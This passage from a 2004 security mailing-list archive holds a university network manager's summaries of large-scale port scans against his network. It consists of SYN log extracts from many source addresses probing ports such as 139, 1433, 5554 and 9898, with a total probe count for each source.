******S* Jul 4 00:57:40 218.61.144.160:2960 -> xxx.yyy.174.169:9898 SYN ******S* 12206 Jul 4 00:56:40 61.51.119.171:2880 -> xxx.yyy.72.124:5554 SYN ******S* Jul 4 00:56:41 61.51.119.171:3375 -> xxx.yyy.72.124:1023 SYN ******S* Jul 4 00:56:43 61.51.119.171:4435 -> xxx.yyy.72.124:9898 SYN ******S* Jul 4 00:56:40 61.51.119.171:2882 -> xxx.yyy.72.126:5554 SYN ******S* Jul 4 00:56:41 61.51.119.171:3378 -> xxx.yyy.72.126:1023 SYN ******S* Jul 4 00:56:43 61.51.119.171:4441 -> xxx.yyy.72.126:9898 SYN ******S* Jul 4 00:56:40 61.51.119.171:2881 -> xxx.yyy.72.125:5554 SYN ******S* Jul 4 00:56:41 61.51.119.171:3376 -> xxx.yyy.72.125:1023 SYN ******S* [...] Jul 4 00:57:32 61.51.119.171:1065 -> xxx.yyy.73.46:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1064 -> xxx.yyy.73.45:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1066 -> xxx.yyy.73.47:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1067 -> xxx.yyy.73.48:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1082 -> xxx.yyy.73.49:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1081 -> xxx.yyy.73.43:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1162 -> xxx.yyy.73.50:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1225 -> xxx.yyy.73.51:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1226 -> xxx.yyy.73.52:9898 SYN ******S* 12061 Jul 4 23:55:57 61.41.94.19:4527 -> xxx.yyy.214.246:5554 SYN ******S* Jul 4 23:55:58 61.41.94.19:2317 -> xxx.yyy.214.246:1023 SYN ******S* Jul 4 23:56:00 61.41.94.19:4367 -> xxx.yyy.214.246:9898 SYN ******S* Jul 4 23:55:57 61.41.94.19:4530 -> xxx.yyy.214.248:5554 SYN ******S* Jul 4 23:55:58 61.41.94.19:2365 -> xxx.yyy.214.248:1023 SYN ******S* Jul 4 23:56:00 61.41.94.19:4388 -> xxx.yyy.214.248:9898 SYN ******S* Jul 4 23:55:57 61.41.94.19:4528 -> xxx.yyy.214.247:5554 SYN ******S* Jul 4 23:55:58 61.41.94.19:2334 -> xxx.yyy.214.247:1023 SYN ******S* [...] Jul 4 23:56:50 61.41.94.19:2319 -> xxx.yyy.235.85:9898 SYN ******S* Jul 4 23:56:50 61.41.94.19:2317 -> xxx.yyy.235.84:9898 SYN ******S* Jul 4 23:56:50 61.41.94.19:2343 -> xxx.yyy.235.86:9898 SYN ******S* Jul 4 23:56:50 61.41.94.19:2603 -> xxx.yyy.235.88:9898 SYN ******S* Jul 4 23:56:50 61.41.94.19:2683 -> xxx.yyy.235.89:9898 SYN ******S* Jul 4 23:56:51 61.41.94.19:2866 -> xxx.yyy.235.93:9898 SYN ******S* Jul 4 23:56:51 61.41.94.19:3236 -> xxx.yyy.235.57:9898 SYN ******S* Jul 4 23:56:51 61.41.94.19:3227 -> xxx.yyy.235.102:9898 SYN ******S* Jul 4 23:56:51 61.41.94.19:3295 -> xxx.yyy.235.59:9898 SYN ******S* 11778 Jul 4 00:17:42 61.229.9.30:3428 -> xxx.yyy.1.12:8000 SYN ******S* Jul 4 00:17:39 61.229.9.30:3431 -> xxx.yyy.1.13:8000 SYN ******S* Jul 4 00:17:39 61.229.9.30:3456 -> xxx.yyy.1.21:8000 SYN ******S* Jul 4 00:17:43 61.229.9.30:3496 -> xxx.yyy.1.39:8000 SYN ******S* Jul 4 00:17:43 61.229.9.30:3506 -> xxx.yyy.1.44:8000 SYN ******S* Jul 4 00:17:43 61.229.9.30:3584 -> xxx.yyy.1.65:8000 SYN ******S* Jul 4 00:17:40 61.229.9.30:3589 -> xxx.yyy.1.67:8000 SYN ******S* Jul 4 00:17:43 61.229.9.30:3668 -> xxx.yyy.1.93:8000 SYN ******S* [...] Jul 4 00:33:20 61.229.9.30:4122 -> xxx.yyy.255.146:8000 SYN ******S* Jul 4 00:33:20 61.229.9.30:4149 -> xxx.yyy.255.151:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4226 -> xxx.yyy.255.169:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4260 -> xxx.yyy.255.175:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4263 -> xxx.yyy.255.176:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4350 -> xxx.yyy.255.202:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4362 -> xxx.yyy.255.207:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4372 -> xxx.yyy.255.214:8000 SYN ******S* Jul 4 00:33:22 61.229.9.30:4436 -> xxx.yyy.255.227:8000 SYN ******S* 11663 Jul 4 00:55:56 221.202.234.125:2325 -> xxx.yyy.133.234:1023 SYN ******S* Jul 4 00:55:58 221.202.234.125:3247 -> xxx.yyy.133.234:9898 SYN ******S* Jul 4 00:55:56 221.202.234.125:2327 -> xxx.yyy.133.236:1023 SYN ******S* Jul 4 00:55:58 221.202.234.125:3249 -> xxx.yyy.133.236:9898 SYN ******S* Jul 4 00:55:56 221.202.234.125:2326 -> xxx.yyy.133.235:1023 SYN ******S* Jul 4 00:55:58 221.202.234.125:3248 -> xxx.yyy.133.235:9898 SYN ******S* Jul 4 00:55:56 221.202.234.125:2331 -> xxx.yyy.133.244:1023 SYN ******S* Jul 4 00:55:58 221.202.234.125:3253 -> xxx.yyy.133.244:9898 SYN ******S* [...] Jul 4 00:56:45 221.202.234.125:3545 -> xxx.yyy.154.86:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3554 -> xxx.yyy.154.96:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3549 -> xxx.yyy.154.90:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3556 -> xxx.yyy.154.98:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3552 -> xxx.yyy.154.93:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3553 -> xxx.yyy.154.95:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3557 -> xxx.yyy.154.99:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3555 -> xxx.yyy.154.97:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3558 -> xxx.yyy.154.100:9898 SYN ******S* 9887 Jul 4 00:56:38 61.49.210.205:3209 -> xxx.yyy.215.210:5554 SYN ******S* Jul 4 00:56:38 61.49.210.205:3213 -> xxx.yyy.215.213:5554 SYN ******S* Jul 4 00:56:39 61.49.210.205:4699 -> xxx.yyy.215.213:1023 SYN ******S* Jul 4 00:56:38 61.49.210.205:3232 -> xxx.yyy.215.218:5554 SYN ******S* Jul 4 00:56:38 61.49.210.205:3220 -> xxx.yyy.215.214:5554 SYN ******S* Jul 4 00:56:39 61.49.210.205:4701 -> xxx.yyy.215.214:1023 SYN ******S* Jul 4 00:56:41 61.49.210.205:2602 -> xxx.yyy.215.214:9898 SYN ******S* Jul 4 00:56:38 61.49.210.205:3234 -> xxx.yyy.215.221:5554 SYN ******S* [...] Jul 4 00:57:22 61.49.210.205:3043 -> xxx.yyy.236.67:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3041 -> xxx.yyy.236.66:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3038 -> xxx.yyy.236.64:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3072 -> xxx.yyy.236.71:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3074 -> xxx.yyy.236.73:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3075 -> xxx.yyy.236.72:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3085 -> xxx.yyy.236.76:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3104 -> xxx.yyy.236.74:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3105 -> xxx.yyy.236.75:9898 SYN ******S* 8633 Jul 4 00:52:28 220.184.105.41:3859 -> xxx.yyy.92.26:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3865 -> xxx.yyy.92.27:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3871 -> xxx.yyy.92.32:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3875 -> xxx.yyy.92.34:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3876 -> xxx.yyy.92.37:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3874 -> xxx.yyy.92.43:5554 SYN ******S* Jul 4 00:52:26 220.184.105.41:3882 -> xxx.yyy.92.46:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3888 -> xxx.yyy.92.49:5554 SYN ******S* [...] Jul 4 01:10:07 220.184.105.41:1182 -> xxx.yyy.111.236:9898 SYN ******S* Jul 4 01:10:08 220.184.105.41:1188 -> xxx.yyy.111.239:9898 SYN ******S* Jul 4 01:10:08 220.184.105.41:1193 -> xxx.yyy.111.240:9898 SYN ******S* Jul 4 01:10:08 220.184.105.41:1199 -> xxx.yyy.111.242:9898 SYN ******S* Jul 4 01:10:09 220.184.105.41:1209 -> xxx.yyy.111.244:9898 SYN ******S* Jul 4 01:10:09 220.184.105.41:1225 -> xxx.yyy.111.247:9898 SYN ******S* Jul 4 01:10:10 220.184.105.41:1245 -> xxx.yyy.111.252:9898 SYN ******S* Jul 4 01:10:11 220.184.105.41:1267 -> xxx.yyy.111.255:9898 SYN ******S* 8307 Jul 4 00:57:02 221.202.6.137:1197 -> xxx.yyy.175.88:1023 SYN ******S* Jul 4 00:57:04 221.202.6.137:2104 -> xxx.yyy.175.88:9898 SYN ******S* Jul 4 00:57:02 221.202.6.137:1200 -> xxx.yyy.175.90:1023 SYN ******S* Jul 4 00:57:04 221.202.6.137:2105 -> xxx.yyy.175.90:9898 SYN ******S* Jul 4 00:57:02 221.202.6.137:1201 -> xxx.yyy.175.91:1023 SYN ******S* Jul 4 00:57:04 221.202.6.137:2106 -> xxx.yyy.175.91:9898 SYN ******S* Jul 4 00:57:02 221.202.6.137:1202 -> xxx.yyy.175.92:1023 SYN ******S* Jul 4 00:57:04 221.202.6.137:2107 -> xxx.yyy.175.92:9898 SYN ******S* [...] Jul 4 00:57:44 221.202.6.137:2075 -> xxx.yyy.176.142:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2076 -> xxx.yyy.176.143:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2077 -> xxx.yyy.176.144:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2079 -> xxx.yyy.176.146:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2080 -> xxx.yyy.176.147:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2082 -> xxx.yyy.176.149:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2078 -> xxx.yyy.176.145:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2081 -> xxx.yyy.176.148:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2083 -> xxx.yyy.176.150:9898 SYN ******S* 8179 Jul 4 03:08:48 132.236.46.125:2663 -> xxx.yyy.1.2:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2664 -> xxx.yyy.1.3:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2665 -> xxx.yyy.1.4:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2666 -> xxx.yyy.1.5:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2667 -> xxx.yyy.1.6:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2668 -> xxx.yyy.1.7:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2669 -> xxx.yyy.1.8:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2670 -> xxx.yyy.1.9:139 SYN ******S* [...] Jul 4 03:37:31 132.236.46.125:4090 -> xxx.yyy.32.245:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4095 -> xxx.yyy.32.248:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4102 -> xxx.yyy.32.252:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4098 -> xxx.yyy.32.249:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4099 -> xxx.yyy.32.250:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4100 -> xxx.yyy.32.251:139 SYN ******S* Jul 4 03:37:32 132.236.46.125:4110 -> xxx.yyy.32.253:139 SYN ******S* Jul 4 03:37:32 132.236.46.125:4111 -> xxx.yyy.32.254:139 SYN ******S* 8126 Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.3:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.4:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.5:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.6:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.7:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.8:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.9:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.10:139 SYN ******S* [...] Jul 4 12:43:31 82.64.151.21:27938 -> xxx.yyy.223.246:139 SYN ******S* Jul 4 12:43:31 82.64.151.21:27938 -> xxx.yyy.223.247:139 SYN ******S* Jul 4 12:43:31 82.64.151.21:27938 -> xxx.yyy.223.248:139 SYN ******S* Jul 4 12:43:31 82.64.151.21:27938 -> xxx.yyy.223.249:139 SYN ******S* Jul 4 12:43:31 82.64.151.21:27938 -> xxx.yyy.223.250:139 SYN ******S* Jul 4 12:43:31 82.64.151.21:27938 -> xxx.yyy.223.251:139 SYN ******S* Jul 4 12:43:31 82.64.151.21:27938 -> xxx.yyy.223.252:139 SYN ******S* Jul 4 12:43:31 82.64.151.21:27938 -> xxx.yyy.223.253:139 SYN ******S* 7784 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From Ken.Connelly at uni.edu Tue Jul 6 16:19:14 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Tue, 06 Jul 2004 11:19:14 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LC50VDGAMC8YBZ2Y@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 5 09:01:02 82.39.40.106:1870 -> xxx.yyy.1.0:1433 SYN ******S* Jul 5 09:01:02 82.39.40.106:1872 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 09:01:02 82.39.40.106:1874 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 09:01:02 82.39.40.106:1876 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 09:01:02 82.39.40.106:1878 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 09:01:02 82.39.40.106:1880 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 09:01:03 82.39.40.106:1884 -> xxx.yyy.1.7:1433 SYN ******S* Jul 5 09:01:00 82.39.40.106:1886 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 5 12:48:59 82.39.40.106:2584 -> xxx.yyy.255.247:1433 SYN ******S* Jul 5 12:48:59 82.39.40.106:2600 -> xxx.yyy.255.248:1433 SYN ******S* Jul 5 12:48:59 82.39.40.106:2604 -> xxx.yyy.255.249:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2608 -> xxx.yyy.255.250:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2612 -> xxx.yyy.255.251:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2616 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2617 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2627 -> xxx.yyy.255.254:1433 SYN ******S* 122618 Jul 5 07:28:35 24.225.241.169:3837 -> xxx.yyy.1.0:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3838 -> xxx.yyy.1.1:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3839 -> xxx.yyy.1.2:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3841 -> xxx.yyy.1.3:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3842 -> xxx.yyy.1.4:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3843 -> xxx.yyy.1.5:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3844 -> xxx.yyy.1.6:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3848 -> xxx.yyy.1.7:139 SYN ******S* [...] Jul 5 07:50:38 24.225.241.169:1377 -> xxx.yyy.255.248:139 SYN ******S* Jul 5 07:50:38 24.225.241.169:1361 -> xxx.yyy.255.245:139 SYN ******S* Jul 5 07:50:38 24.225.241.169:1376 -> xxx.yyy.255.247:139 SYN ******S* Jul 5 07:50:38 24.225.241.169:1385 -> xxx.yyy.255.249:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1402 -> xxx.yyy.255.253:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1401 -> xxx.yyy.255.252:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1404 -> xxx.yyy.255.254:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1387 -> xxx.yyy.255.250:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1391 -> xxx.yyy.255.251:139 SYN ******S* 121278 Jul 5 21:04:36 64.231.162.117:1137 -> xxx.yyy.1.1:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1138 -> xxx.yyy.1.2:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1139 -> xxx.yyy.1.3:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1140 -> xxx.yyy.1.4:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1142 -> xxx.yyy.1.5:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1144 -> xxx.yyy.1.6:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1146 -> xxx.yyy.1.7:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1148 -> xxx.yyy.1.8:139 SYN ******S* [...] Jul 5 23:59:59 64.231.162.117:1093 -> xxx.yyy.184.8:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1094 -> xxx.yyy.184.9:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1095 -> xxx.yyy.184.10:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1096 -> xxx.yyy.184.11:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1097 -> xxx.yyy.184.12:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1098 -> xxx.yyy.184.13:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1099 -> xxx.yyy.184.14:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1100 -> xxx.yyy.184.15:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1101 -> xxx.yyy.184.16:139 SYN ******S* 74060 Jul 5 15:34:43 67.11.206.12:1053 -> xxx.yyy.1.1:6129 SYN ******S* Jul 5 15:34:43 67.11.206.12:1054 -> xxx.yyy.1.2:6129 SYN ******S* Jul 5 15:34:43 67.11.206.12:1055 -> xxx.yyy.1.3:6129 SYN ******S* Jul 5 15:34:45 67.11.206.12:1056 -> xxx.yyy.1.4:6129 SYN ******S* Jul 5 15:34:45 67.11.206.12:1057 -> xxx.yyy.1.5:6129 SYN ******S* Jul 5 15:34:45 67.11.206.12:1058 -> xxx.yyy.1.6:6129 SYN ******S* Jul 5 15:34:42 67.11.206.12:1059 -> xxx.yyy.1.7:6129 SYN ******S* Jul 5 15:34:45 67.11.206.12:1060 -> xxx.yyy.1.8:6129 SYN ******S* [...] Jul 5 15:45:39 67.11.206.12:3574 -> xxx.yyy.255.160:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3578 -> xxx.yyy.255.164:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3579 -> xxx.yyy.255.165:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3582 -> xxx.yyy.255.168:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3580 -> xxx.yyy.255.166:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3581 -> xxx.yyy.255.167:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3583 -> xxx.yyy.255.169:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3584 -> xxx.yyy.255.170:6129 SYN ******S* 72699 Jul 5 18:27:16 66.226.210.162:2448 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2449 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 18:27:13 66.226.210.162:2450 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 18:27:13 66.226.210.162:2451 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2452 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2453 -> xxx.yyy.1.6:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2455 -> xxx.yyy.1.8:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2456 -> xxx.yyy.1.9:1433 SYN ******S* [...] Jul 5 18:38:54 66.226.210.162:1549 -> xxx.yyy.255.248:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1553 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1550 -> xxx.yyy.255.249:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1554 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1545 -> xxx.yyy.255.244:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1551 -> xxx.yyy.255.250:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1546 -> xxx.yyy.255.245:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1552 -> xxx.yyy.255.251:1433 SYN ******S* 72453 Jul 5 20:36:41 151.36.102.55:1999 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2000 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2001 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2002 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2003 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2004 -> xxx.yyy.1.6:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2005 -> xxx.yyy.1.7:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2006 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 5 21:07:11 151.36.102.55:2098 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 21:07:11 151.36.102.55:2099 -> xxx.yyy.255.254:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2091 -> xxx.yyy.255.246:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2092 -> xxx.yyy.255.247:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2095 -> xxx.yyy.255.250:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2096 -> xxx.yyy.255.251:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2097 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2098 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2099 -> xxx.yyy.255.254:1433 SYN ******S* 72186 Jul 5 17:00:45 192.203.200.67:1070 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1071 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1072 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1073 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1074 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1075 -> xxx.yyy.1.6:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1076 -> xxx.yyy.1.7:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1077 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 5 17:12:25 192.203.200.67:3202 -> xxx.yyy.255.222:1433 SYN ******S* Jul 5 17:12:25 192.203.200.67:3203 -> xxx.yyy.255.223:1433 SYN ******S* Jul 5 17:12:25 192.203.200.67:3204 -> xxx.yyy.255.224:1433 SYN ******S* Jul 5 17:12:25 192.203.200.67:3205 -> xxx.yyy.255.225:1433 SYN ******S* Jul 5 17:12:25 192.203.200.67:3206 -> xxx.yyy.255.226:1433 SYN ******S* Jul 5 17:12:26 192.203.200.67:3210 -> xxx.yyy.255.230:1433 SYN ******S* Jul 5 17:12:26 192.203.200.67:3211 -> xxx.yyy.255.231:1433 SYN ******S* Jul 5 17:12:26 192.203.200.67:3212 -> xxx.yyy.255.232:1433 SYN ******S* 72169 Jul 5 01:04:59 192.135.10.148:4914 -> xxx.yyy.1.1:8000 SYN ******S* Jul 5 01:04:59 192.135.10.148:4916 -> xxx.yyy.1.2:8000 SYN ******S* Jul 5 01:04:59 192.135.10.148:4917 -> xxx.yyy.1.3:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4918 -> xxx.yyy.1.4:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4919 -> xxx.yyy.1.5:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4920 -> xxx.yyy.1.6:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4922 -> xxx.yyy.1.7:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4923 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 5 01:14:15 192.135.10.148:2529 -> xxx.yyy.zzz.247:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2530 -> xxx.yyy.zzz.248:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2531 -> xxx.yyy.zzz.249:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2532 -> xxx.yyy.zzz.250:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2533 -> xxx.yyy.zzz.251:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2534 -> xxx.yyy.zzz.252:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2537 -> xxx.yyy.zzz.253:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2538 -> xxx.yyy.zzz.254:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2460 -> xxx.yyy.zzz.191:8000 SYN ******S* 70712 Jul 5 15:30:23 206.13.56.94:1038 -> xxx.yyy.1.1:80 SYN ******S* Jul 5 15:30:23 206.13.56.94:1041 -> xxx.yyy.1.2:80 SYN ******S* Jul 5 15:30:23 206.13.56.94:1044 -> xxx.yyy.1.3:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1047 -> xxx.yyy.1.4:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1050 -> xxx.yyy.1.5:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1053 -> xxx.yyy.1.6:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1056 -> xxx.yyy.1.7:80 SYN ******S* Jul 5 15:30:25 206.13.56.94:1059 -> xxx.yyy.1.8:80 SYN ******S* [...] Jul 5 15:40:22 206.13.56.94:4506 -> xxx.yyy.255.196:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4511 -> xxx.yyy.255.197:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4516 -> xxx.yyy.255.198:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4527 -> xxx.yyy.255.199:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4534 -> xxx.yyy.255.200:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4538 -> xxx.yyy.255.201:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4549 -> xxx.yyy.255.202:80 SYN ******S* Jul 5 15:40:22 206.13.56.94:4563 -> xxx.yyy.255.203:80 SYN ******S* 70532 Jul 5 13:32:14 69.70.36.106:2152 -> xxx.yyy.1.0:1433 SYN ******S* Jul 5 13:32:11 69.70.36.106:2164 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 13:32:14 69.70.36.106:2176 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 13:32:11 69.70.36.106:2191 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 13:32:14 69.70.36.106:2202 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 13:32:11 69.70.36.106:2212 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 13:32:14 69.70.36.106:2219 -> xxx.yyy.1.6:1433 SYN ******S* Jul 5 13:32:11 69.70.36.106:2231 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 5 14:39:26 69.70.36.106:1272 -> xxx.yyy.255.246:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1283 -> xxx.yyy.255.247:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1294 -> xxx.yyy.255.248:1433 SYN ******S* Jul 5 14:39:26 69.70.36.106:1305 -> 